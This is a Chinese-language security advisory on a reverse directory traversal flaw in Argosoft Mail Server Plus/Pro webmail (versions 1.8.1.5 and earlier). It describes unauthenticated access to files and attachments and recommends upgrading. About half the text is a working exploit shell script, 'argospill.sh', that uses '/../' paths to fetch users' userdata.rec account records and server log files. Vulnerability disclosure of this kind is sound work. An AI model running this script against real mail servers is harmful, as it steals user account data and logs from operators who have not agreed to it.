涉及程序:
Argosoft Mail Server Plus/Pro
描述:
Argosoft Mail Server Plus/Pro Webmail 反向目录遍历漏洞
详细:
Argosoft Mail Server Pro 是一款 Windows 下的全功能邮件服务器,支持 POP3/SMTP/FINGER,简单易用。其有三款版本: Freeware, Plus,和 Pro 。
Argosoft Mail Server Pro 和 Plus 均包含一用于 webmail 访问的内置 HTTP server ,以提供简单的用户邮件访问功能。
这个 webmail 服务器并不会对反向目录遍历进行验证,一个攻击者如果在 webmail 服务器中一个有效用户的图象或附件路径后输入一连串的 "/.." ,即可利用反向目录遍历获得驱动器上任何系统可读文件。
另外通常,一个用户必须登陆到 webmail 上去才能读取自己的邮件和附件,然而Argosoft Mail Server Pro/plus 存在的漏洞也允许一个未经验证的用户只要在 URL 中输入了有效的路径也可获得。这能被攻击者利用来通过一定的条件来获得用户的附件。当然,这也能通过反向遍历来获得。
当用户已经退出 webmail 服务器,附件文件夹被删除或用户停滞了20分钟以后,攻击将会起作用(哪怕附件文件夹已经不存在)。
Impact
===================
需要注意的是这个漏洞并不是说文件的目录列表已经给你列出来了,往往需要攻击者指定文件名和相对的路径。而且可执行文件在这里是不允许运行的,因为 webmail 并不支持。
受影响系统
===================
任何使用低于或等于 1.8.1.5 版本 Argosoft Mail Server Plus / Pro 作为其 webmail 服务的 Windows 系统。
值得注意的是免费软件(freeware)版本的Argosoft Mail Server 没有此漏洞。
攻击方法:
#!/bin/sh
#
# released on 06/07/2002 by team n.finity
# find us at http://nfinity.yoll.net/
#
# argospill.sh
HOST=$1
USER=$2
DOMAIN=$3
startpro()
{
echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startplus()
{
echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
URL=/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startboth()
{
echo -e "\nSpilling host $HOST (Plus / Pro)\n"
URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
/usr/bin/lynx -dump http://$HOST$URL
}
usage()
{
echo -e "\nUsage:\n"
echo "Both - $0 "
echo "Pro - $0 "
echo "Plus - $0 "
echo -e "\nExample:\n"
echo "Both, images dir - $0 www.test.com"
echo "Plus, no dom req - $0 www.test.com me"
echo "Pro, default dom - $0 www.test.com me _nodomain"
echo "Pro, virtual dom - $0 www.test.com me test.com"
}
echo "Argospill 1.0 by Team N.finity"
if [ -n "$HOST" ]; then
if [ -n "$USER" ]; then
if [ -n "$DOMAIN" ]; then
startpro
else
startplus
fi
else
startboth
fi
else
usage
fi
解决方案:
CNNS 建议用户尽快升级到最新版本
http://www.argosoft.com/applications/mailserver/
